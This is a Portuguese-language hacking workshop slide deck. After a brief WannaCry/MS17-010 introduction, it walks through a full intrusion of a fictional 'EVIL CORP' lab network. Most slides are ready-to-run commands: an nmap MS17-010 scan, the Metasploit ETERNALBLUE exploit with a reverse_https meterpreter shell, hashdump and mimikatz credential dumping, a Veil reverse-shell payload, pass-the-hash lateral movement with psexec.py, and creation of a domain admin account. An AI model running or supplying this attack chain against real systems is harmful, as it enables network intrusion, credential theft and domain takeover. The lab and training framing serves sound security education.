Top Banner
NSA HACKING Washington Silas [email protected] Jonathan Messias [email protected]
16

Apresentação do PowerPoint · Introdução De onde vem o WannaCry? Especialistas notaram que o ransomware WannaCry se comporta como um worm, usando dois métodos de ataque encontrados

Apr 01, 2019

Download

Documents

doanphuc
Welcome message from author
This document is posted to help you gain knowledge. Please leave a comment to let me know what you think about it! Share it to your friends and learn new things together.
Transcript
Page 1: Apresentação do PowerPoint · Introdução De onde vem o WannaCry? Especialistas notaram que o ransomware WannaCry se comporta como um worm, usando dois métodos de ataque encontrados

NSA HACKING

Washington [email protected]

Jonathan [email protected]

Page 2: Apresentação do PowerPoint · Introdução De onde vem o WannaCry? Especialistas notaram que o ransomware WannaCry se comporta como um worm, usando dois métodos de ataque encontrados

Introdução

O que é o WannaCry?

O ransomware WannaCry visa redes que usam SMBv1, um protocolo que ajuda PCs a se comunicarem com impressoras e outros dispositivos conectados na rede. Essa versão, que vem de 2003, deixa computadores expostos a hackers, uma vulnerabilidade chamada MS17-010. A Microsoft lançou um patch para corrigi-la em março de 2017 para as versões do Windows que ainda têm suporte, mas qualquer pessoa que não tenha instalado o patch tornou-se um alvo fácil para os hackers que criaram o WannaCry.

Quais são os alvos do WannaCry?

Durante um grande surto de ransomware em maio de 2017, Rússia, China, Ucrânia, Taiwan, Índia e Brasil foram os países mais afetados. O WannaCry afetou tanto pessoas quanto organizações governamentais, hospitais, universidades, empresas ferroviárias, firmas de tecnologia e operadoras de telecomunicações em mais de 150 países. O National Health Service do Reino Unido, Deutsche Bahn, a empresa espanhola Telefónica, FedEx, Hitachi e Renault estavam entre as vítimas.

Page 3: Apresentação do PowerPoint · Introdução De onde vem o WannaCry? Especialistas notaram que o ransomware WannaCry se comporta como um worm, usando dois métodos de ataque encontrados

Introdução

De onde vem o WannaCry?

Especialistas notaram que o ransomware WannaCry se comporta como um worm, usando dois métodos de ataque encontrados no arsenal que vazou da NSA (ETERNALBLUE e DOUBLEPULSAR). Eles também encontraram evidência que liga o surto de ransomware ao Grupo Lazarus da Coreia do Norte.

Em 2014, os hackers (conhecidos por usar bitcoin em suas operações) apagaram mais de um terabyte de dados do banco de dados da Sony Pictures. Eles também criaram um backdoor maligno em 2015 e se envolveram em um ataque cibernético de US$ 81 milhões no Banco Central de Bangladesh em 2016.

Page 4: Apresentação do PowerPoint · Introdução De onde vem o WannaCry? Especialistas notaram que o ransomware WannaCry se comporta como um worm, usando dois métodos de ataque encontrados

Objetivo

[*] Nesta oficina você vai ter os primeiros contatos com Hacking sendo um espião da NSA com a missão de invadir o computador de um executivo da empresa EVIL CORP, e através dessa invasão chegar até o servidor principal e controlar toda a empresa.

[*] Este material está dividido em 3 partes, sendo elas:

PARTE 1 - Comprometer o computador da recepcionista da EVIL CORP, coletar a hash do administrador local e pegar a credencial em texto puro de um usuário de domínio.PARTE 2 - Fazer movimentação lateral para o computador do CEO da EVIL CORP e pegar as credenciais em texto puro de um administrador de domínio.PARTE 3 - Conseguir fazer acesso remoto no servidor AD, criar um usuário com privilégios administrativos e poder controlar toda a EVIL CORP.

Page 5: Apresentação do PowerPoint · Introdução De onde vem o WannaCry? Especialistas notaram que o ransomware WannaCry se comporta como um worm, usando dois métodos de ataque encontrados

Fases de um ataque

Page 6: Apresentação do PowerPoint · Introdução De onde vem o WannaCry? Especialistas notaram que o ransomware WannaCry se comporta como um worm, usando dois métodos de ataque encontrados

PARTE 1

Page 7: Apresentação do PowerPoint · Introdução De onde vem o WannaCry? Especialistas notaram que o ransomware WannaCry se comporta como um worm, usando dois métodos de ataque encontrados

01. Logar no Kali-NSA com o usuário root e a senha H@ck3rNS@.

02. Abra um terminal e rode o nmap em toda a rede para procurar algum alvo vulnerável ao WannaCry.nmap -v -n -Pn -sS -sV --script=smb-vuln-ms17-010.nse 192.168.15.0/24 -p 445

Você deverá ver o retorno do nmap do seu alvo vulnerável como a imagem a seguir:

Fase 01 - Reconhecimento

03. Verifique a arquitetura do Sistema Operacional do alvo, para saber qual payload usar na exploração.cme smb <IP DO ALVO>

Page 8: Apresentação do PowerPoint · Introdução De onde vem o WannaCry? Especialistas notaram que o ransomware WannaCry se comporta como um worm, usando dois métodos de ataque encontrados

01. Acesse o Metasploit, framework de exploração utilizado pela NSA com o objetivo de comprometer os seus alvos.msfconsole

02. Vamos usar o exploit ETERNALBLUE para fazer o ataque, o mesmo usado pelo WannaCry, mas no lugar de inserir um ransomware vamos obter controle do alvo.use exploit/windows/smb/eternalblue_doublepulsar

03. Veja as informações que o exploit necessita para a exploração.show options

04. Fazer a configuração do exploit.set RHOST <IP DO ALVO>set PROCESSINJECT lsass.exeset TARGETARCHITECTURE x64set WINEPATH /var/lib/veil/wine/drive_c/

Fase 02 - Preparando o Armamento

Page 9: Apresentação do PowerPoint · Introdução De onde vem o WannaCry? Especialistas notaram que o ransomware WannaCry se comporta como um worm, usando dois métodos de ataque encontrados

05. Selecionar um payload de shell reverso e configure.set PAYLOAD windows/x64/meterpreter/reverse_httpsset LHOST <IP KALI>set LPORT 443

Fase 02 - Preparando o Armamento

Veja as opções do exploit e payload na imagem a seguir:

Page 10: Apresentação do PowerPoint · Introdução De onde vem o WannaCry? Especialistas notaram que o ransomware WannaCry se comporta como um worm, usando dois métodos de ataque encontrados

01. Executar o exploit.exploit

02. Migrar para o processo lsass.migrate -N lsass.exegetsystem

03. Coletar informações da vitima.sysinfo

04. Extrair hashs dos usuários.hashdump

05. Extrair credenciais dos usuários usando o mimikatz.load kiwicreds_all

Fase 03 - Exploração

Exploração realizada com sucesso:

[*] Guardar as informações coletadas em algum editor de texto.

Page 11: Apresentação do PowerPoint · Introdução De onde vem o WannaCry? Especialistas notaram que o ransomware WannaCry se comporta como um worm, usando dois métodos de ataque encontrados

PARTE 2

Page 12: Apresentação do PowerPoint · Introdução De onde vem o WannaCry? Especialistas notaram que o ransomware WannaCry se comporta como um worm, usando dois métodos de ataque encontrados

01. Busque máquinas na rede que você possa se autenticar com a hash capturada.cme smb 192.168.15.0/24 -u administrator -H <HASH> --local-auth

02. Gere um payload em GO de shell reverso no veil.veiluse 1use 15set LHOST <IP KALI>set LPORT 4444

03. Verifique se as informações estão corretas depois gere o payload.optionsgenerate

Fase 01 - Movimentação Lateral

[*] De um nome de sua preferência para o payload.

As máquinas que tiverem (Pwn3d!) você vai conseguir se autenticar com a HASH obtida.

Page 13: Apresentação do PowerPoint · Introdução De onde vem o WannaCry? Especialistas notaram que o ransomware WannaCry se comporta como um worm, usando dois métodos de ataque encontrados

03. Ative o listening no metasploit.use multi/handlerset PAYLOAD windows/meterpreter/reverse_httpsset LHOST <SEU IP>set LPORT 4444exploit -j -z

04. Faça movimentação lateral para a máquina do CEO usando o psexec.py e o payload gerado por você.cd /root/Toolspython psexec.py -hashes <HASH> administrator@<IP ALVO> -c /var/lib/veil/output/compiled/payload.exe

Fase 01 - Movimentação Lateral

Se tudo der certo você vai receber uma sessão com privilégio de system no metasploit.

Page 14: Apresentação do PowerPoint · Introdução De onde vem o WannaCry? Especialistas notaram que o ransomware WannaCry se comporta como um worm, usando dois métodos de ataque encontrados

05. Faça o procedimento de migração de processo e captura de senhas novamente.sessions Xmigrate -N winlogon.exegetsystemload kiwicreds_all

Fase 01 - Movimentação Lateral

Após migrar de processo e carregaro módulo do mimikatz, você vai veruma tela como a imagem ao lado.

Page 15: Apresentação do PowerPoint · Introdução De onde vem o WannaCry? Especialistas notaram que o ransomware WannaCry se comporta como um worm, usando dois métodos de ataque encontrados

PARTE 3

Page 16: Apresentação do PowerPoint · Introdução De onde vem o WannaCry? Especialistas notaram que o ransomware WannaCry se comporta como um worm, usando dois métodos de ataque encontrados

01. Acesse o Servidor AD com o usuário capturado na máquina da recepcionista.rdesktop <IP SERVIDOR> -d <DOMINIO> -u <USUARIO>

02. Coloque a senha e obtenha acesso ao servidor.

03. Siga esses passos para criar um usuário com acesso total a EVIL CORP.Start -> Windows Administrative Tools -> Active Directory Users and Computers

04. Coloque o usuário e senha capturados na máquina do CEO.

05. Clique no nome do domínio, em seguida clique com o botão direito em Domain Controllers, New, User.

Fase 01 - Conquistar a EVIL CORP

PARABÉNS, VOCÊ DOMINOU TODA A REDE DA EVIL CORP!AGORA VOCÊ É UM ESPIÃO DA NSA!